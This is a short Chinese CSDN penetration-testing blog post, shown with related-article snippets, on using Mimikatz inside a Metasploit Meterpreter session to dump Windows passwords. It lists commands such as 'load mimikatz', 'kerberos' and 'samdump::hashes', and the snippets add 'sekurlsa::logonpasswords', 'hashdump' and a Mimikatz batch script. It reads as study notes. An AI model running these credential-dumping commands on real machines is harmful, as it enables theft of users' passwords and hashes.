Metasploit中使用Mimikatz抓取内存中的Windows密码

最新推荐文章于 2023-05-29 16:45:00 发布
最新推荐文章于 2023-05-29 16:45:00 发布
阅读量1.6k 收藏 6
点赞数 2
分类专栏: 渗透测试学习 文章标签: 渗透测试 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qin9800/article/details/108206836
版权
本文介绍了如何在Metasploit框架中利用Mimikatz模块,通过提升Shell权限至System,来抓取内存中的Windows密码。详细讲述了三种方法,包括获取所有登录用户的明文密码、显示所有用户密码的HASH以及仅显示当前用户加密后的密码。
摘要由CSDN通过智能技术生成

我是通过这个漏洞学习内存抓取Windows密码的

参考:Mimikatz ON Metasploit

首先你需要提升Shell权限为System

加载mimikatz模块

load mimikatz

在这里插入图片描述
三种获取密码方法
一、可以抓取到当前所有登录用户的明文密码(推荐使用)

kerberos

在这里插入图片描述
二、只可显示HASH(显示所有用户密码HASH)

mimikatz_command -f samdump::hashes

在这里插入图片描述
三、只能显示当前登录的用户加密后的密码
在这里插入图片描述

夏了茶糜
关注
专栏目录
Kali破解windows系统用户名密码工具mimikatz
世间繁华梦一出
07-20 4891
mimikatz工具简介 mimikatz是一款强大的系统密码破解获取工具。该工具有段时间是作为一个独立程序运行。现在已被添加到Metasploit框架,并作为一个可加载的Meterpreter模块。当成功的获取到一个远程会话时,使用mimikatz工具可以很快的恢复密码。本节将介绍使用mimikatz工具恢复密码windows2012以下的系统给可直接获取到明文,2012以上的系统只能获取到hash值。 实例演示 (1)通过在目标主机(Windows 7)上运行kali创建的可执行文件木马程序bac
windows内存密码获取mimikatz_trunk
04-17
第一条:privilege::debug //提升权限 第二条:sekurlsa::logonpasswords https://github.com/gentilkiwi/mimikatz/releases/tag/2.1.1-20180325
Windows内存管理机密+揭穿内存优化工具的骗局
weixin_34332905的博客
05-02 181
盆盆译注 4月12日的Webcast,盆盆介绍了Windows Vista最新的内存管理技术SuperFetch。在Webcast的最后,盆盆推荐了Mark Russinovich的一篇揭穿内存优化工具骗局的文章,并承诺会将它翻译成文,并且加上盆盆自己做的注释,在ITECN博客上分享给大家。以下就是这篇文章的文译稿,敬请大家批评指正! 我们在浏览网页时,也许会经常看到一...
Mimikatz ON Metasploit
weixin_33694620的博客
03-08 371
BMa · 2014/06/23 14:05from:http://www.offensive-security.com/metasploit-unleashed/Mimikatz0x00 背景看了各种文章讲神器mimikatz,但是一直没有讲与metasploit使用的。Metasploit其实早就集成了mimikatz,现在将官方的文章翻译给大家。Mimikatz是Benjamin Delpy...
Metasploit-进阶用户密码mimikatz模块kiwi模块
5L2g556F5ZWl77yf
10-30 6026
Metasploit 一. 基础 1. 抓取自动登录的密码 run windows/gather/credentials/windows_autologin 2. 未提权可以使用此命令查询hashdump run windows/gather/smart_hashdump 3. 提权 getsystem 4. 提权后可执行 run hashdump 获取密码 run hashdump 二. mimikatz模块 1. 加载mimikatz模块获取更多权限 ps:mimikatz模块已经合并为k
终于发现windows蚕食内存的秘密
king_xing的专栏
07-27 2217
大家都有体会,用windows开机时间越久占用内存越大。前二天有些空看电影多,突然发现一个svchost.exe进程占用内存一下子就超100M,杀之。后来用SystemExplorer进程查看,发现其参数是svchost.exe -k LocalSystemNetworkRestricted 再查服务,是超级预读服务。因为没上固态硬盘,开机启动还得要开超级预读服务。所以新建一个批处理放在启动文件夹
Metasploit Framework(MSF)的使用
墨鱼菜鸡
10-24 327
目录 Metasploit 安装Metasploit 漏洞利用(exploit) 攻击载荷(payload) Meterpreter MS17_010(永恒之蓝) 辅助模块(探测模块) 漏洞利用模块 后渗透阶段 查看主机是否运行在虚拟机上 关闭杀毒软件 获取目标主机的详细信息 访...
使用Metasploit Framework进行渗透测试的基本姿势
汗的博客
03-31 1327
Metasploit Framework 这篇文章是我自己的学习笔记,发现大家对msf的热情非常高,希望各位师傅更好的使用Metasploit Framework进行渗透测试,重点是关于Meterpreter和Msfvenom的利用,如有问题请指正,使用时注意修改参数。 文章目录Metasploit Framework基础命令Msf5的七大Moduleauxiliary 辅助模块encoders...
渗透测试 ( 3 ) --- Metasploit Framework ( MSF )
墨鱼菜鸡
07-11 4500
白嫖 Metasploit Pro 2022:https://zhuanlan.zhihu.com/p/449836479 白嫖 Metasploit Pro 2022:http://t.zoukankan.com/hxlinux-p-15787814.html 好东西之 metasploit pro:https://www.52pojie.cn/thr...
【红队技巧】Windows存储的密码获取
网安君的博客
04-21 1365
【红队技巧】Windows存储的密码获取使用前提支持版本利用方式参考: 使用前提 需要得到Windows系统密码 支持版本 Windows全版本 微软表示此功能仅包含在 Windows XP 。它目前不包含在任何其他版本的 Windows ,也不会包含在任何未来版本的 Windows 。但是经过测试此函数功能可以在任意Windows版本使用。 利用方式 rundll32 keymgr.dll, KRShowKeyMgr 使用CredentialsFileView工具 Credentials
Metasploit渗透winserv 2003 sp1
E4
04-26 2268
今天因为比赛的原因写一个关于MS08_067的渗透文章,网上已经有很多前辈写过关于MS08_067的文章,非常的好,我也看了很多的文章,对我启发很大。话不多说!开始我今天做题用到的主角MS08_067。 首先我们要先安装好Kali linux 这个在座的肯定比我要熟,对里面的工具,命令已经很透彻了。 我们先对目标靶机进行信息收集,就用到了Nmap这个工具 我使用的参数是 -O 扫描系统版本...
windows密码获取
07-29 2362
概述 渗透测试过程对于windows 系统密码获取是十分重要的一步,获取密码后我们可以对内网其他机器进行撞库,快速、批量拿下其他服务器权限。 windows密码获取方法 最主流的获取windows 密码的方法最主流的方法有三种,mimikatz 直接执行获取;procdump + mimikatz 进行获取;读取注册表进行获取 + mimikatz 解密进行获取。 使用这三种方式的前提是必须在管理员的权限下进行执行命令,不然执行会失败。 mimikatz直接获取 直接将mimikatz 上传到
mimikatz bat 小记
LIVE
05-22 294
if %PROCESSOR_ARCHITECTURE%==x86 (cd ./x32) else cd ./x64 mimikatz.exe log privilege::debug sekurlsa::logonpasswords exit type mimikatz.log | findstr Password pause del mimikatz.log
优秀的Windows密码抓取工具
feiyu361的博客
08-23 963
优秀的工具如下: 01 Mimikatz 简介: Mimikat是一个法国人写的轻量级调试器。Mimikat可以从内存提取纯文本密码,hash,PIN码和kerberos票证。mimikatz还可以执行哈希传递,票证传递或构建Golden票证 项目地址:https://github.com/gentilkiwi/mimikatz/ 使用 cmd运行命令如下: mimikatz.exe # cmd命令执行启动程序 privilege::debug # 提升权限 sekurlsa::logonpas
Metasploit Framework-安全漏洞检测工具使用
mogexiuluo的博客
04-27 5242
一款开源的安全漏洞检测工具,简称MSF。可以收集信息、探测系统漏洞、执行漏洞利用测试等,为渗透测试、攻击编码和漏洞研究提供了一个可靠平台。集成数千个漏洞利用、辅助测试模块,并保持持续更新。由著名黑客、安全专家H.D. Moore主导开发排行榜排名第二位官方网站:。在kali,通过msfconsole进入控制台。
如何使用Metasploit进行后渗透攻击?
最新发布
m0_74131821的博客
05-29 1280
后渗透攻击(PostExploitation)是整个渗透测试过程最能够体现渗透测试团队创造力与技术能力的环节
mimikatz抓取密码
G208_522的博客
10-26 4807
mimikatz抓取密码
centos7+xampp+testlink环境搭建详细教程
zeyu01的博客
09-11 472
1.下载xampp集成包 下载至:/usr/local/src/ 赋权:chmod -R 777 xampp-linux-x64-7.1.7-0-installer.run 2.安装xampp安装包 安装:./xampp-linux-x64-7.1.7-0-installer.run 有提示时一直输入Y即可,直到安装完成; 3.配置xampp 配置:/opt/lampp/lampp security 根据提示:设置xampp密码(用户名xampp)、phpmyadmin密码(用户名pma)、
Metasploit使用指南:搭建与应用解析
安装完成后,Metasploit通常位于特定的安装目录下,可能被杀毒软件误报或拦截,这是正常现象,但为了确保正常使用,需要将相关目录添加到杀毒软件的白名单。 在使用Metasploit时,主要涉及以下几个部分: 1. **...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值